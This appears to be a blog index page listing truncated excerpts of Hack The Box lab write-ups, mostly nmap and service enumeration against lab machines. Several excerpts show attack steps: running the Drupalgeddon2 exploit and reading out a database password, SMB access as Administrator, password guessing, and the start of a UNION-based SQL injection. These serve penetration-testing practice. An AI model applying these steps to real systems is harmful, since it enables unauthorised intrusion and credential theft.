htb

HTB Synced

Today we return with a new of the very easy HTB boxes to try to finish them all. $ nmap -v -p- 10.129.228.37 –min-rate 5000 Rsync port is 873/tcpLet’s see which version rsync is using… $ nmap -v -p873 -sV 10.129.228.37 –min-rate 5000 Another option: $ nc -vn 10.129.228.37 873 Rsync protocol is version 31. From Linux, we can interact with rsync with the tool rsync. $ rsync –help $

HTB Mongod

This is another of the Very easy HTB Starting Point boxes. $ nmap -sV -p- 10.129.143.75 –min-rate 5000 As we can see in the Nmap results we hava a MongoDB version 3.6.8 MongoDB is a NoSQL database.You can find more information in their documentation here: https://www.mongodb.com/docs To be able to interact with the db, we need to install the MongoDB package into our Kali Linux. it is included in the

HTB Tactics

$ nmap -v -Pn 10.129.251.21 We can see, that box has SMB enabled on port 445.SMB stand for Server message block. $ smbclient -L 10.129.251.21 if we don’t add a -U parameter, the smbclient request will be performed using the current user. So, the only user we currently know that the box will contain is the Administrator, so we can use it. $ smbclient -L 10.129.251.21 -U Administrator $ smbclient

HTB Pennyworth

We continue with another very easy HTB box. $ nmap -p- 10.129.243.77 -sV –min-rate 5000 Here we have a Jetty Jetty 9.4.39.v20210325 Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. https://www.eclipse.org/jetty/ If we go to http://10.129.243.77:8080, we’ll be redirected to http://10.129.243.77:8080/login?from=%2F This is a Jenkins server. Leading open source automation server, Jenkins provides hundreds of plugins

HTB Bike

This is another of the HTB Starting Point’s very easy boxes. $ nmap -v -p- -sV 10.129.237.207 –min-rate 5000 Access to http://10.129.237.207/ According to the Nmap scan, the site runs under node.jsWappalyzer describes the Web Framework as Express. There is no email address control checking of the input: In fact, it seems that any input is reflected in the result. If we check for Server-Side Template Injection: The template engine

HTB Ignition

This is another of the Very easy HTB Starting Point boxes. $ sudo nano /etc/hosts $ nmap -p- -A 10.129.232.211 -sV Access to http://ignition.htb/ $ dirsearch -u http://ignition.htb -i 200 Access to http://ignition.htb/admin/ Based on HTB questions, the username is admin. As there is a form_key parameter it’s most difficult to brute-force.So, we can try then to guess manually the password using the most usual passwords. We can find more

HTB Responder

This is another of the HTB Starting Point boxes classified as very easy. $ nmap -p- -min-rate 5000 10.129.225.204 –open -v If we try to access to http://10.129.225.204 we’ll be redirected to http://unika.htb but we can’t see the site. So, let’s add it to our /etc/hostsNow we’ll obtain the correct site: $ whatweb http://unika.htb Here we can see that this site runs with php, over an Windows Apache webserver. Checking

HTB Redeemer

This is one of the starting point HTB boxes.It is rated as a very easy and only have 1 flag. $ nmap -p- -A 10.129.216.146 –min-rate 5000 So, we are facing a Redis v5.0.7 instance. According to its site: Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets,

HTB Armageddon

$ nmap -v -p- -A 10.10.10.233 –min-rate 5000 Site inspection: http://10.10.10.233/ $ whatweb http://10.10.10.233 We are facing a Drupal 7 CMS. $ dirsearch -u http://10.10.10.233/ -i 200 http://10.10.10.233/includes/bootstrap.inc Specifically, it is a Drupal v7.56. Let’s see if this Drupal version has some vulnerability. CVE-2018-7600https://github.com/dreadlocked/Drupalgeddon2 $ git clone https://github.com/dreadlocked/Drupalgeddon2.git$ ruby drupalgeddon2.rb http://10.10.10.233 armageddon.htb>> whoami armageddon.htb>> pwd armageddon.htb>> ls /var/www/html/sites -la armageddon.htb>> ls /var/www/html/sites/default -la armageddon.htb>> cat /var/www/html/sites/default/settings.php Mysql password = CQHEy@9M*m23gBVj

HTB GoodGames

$ nmap -sV -p- goodgames.htb –min-rate 5000 http://goodgames.htb/ We can test if this site is vulnerable to an SQL Injection. If we just add a ‘, we can reach the login page with a registration form. http://internal-administration.goodgames.htb/ We don’t have credentials for this site, but as we’ve confirmed there is an sql injection let’s try to exploit it. First, we need to know how many columns exist. email=admin%40test.com’ union all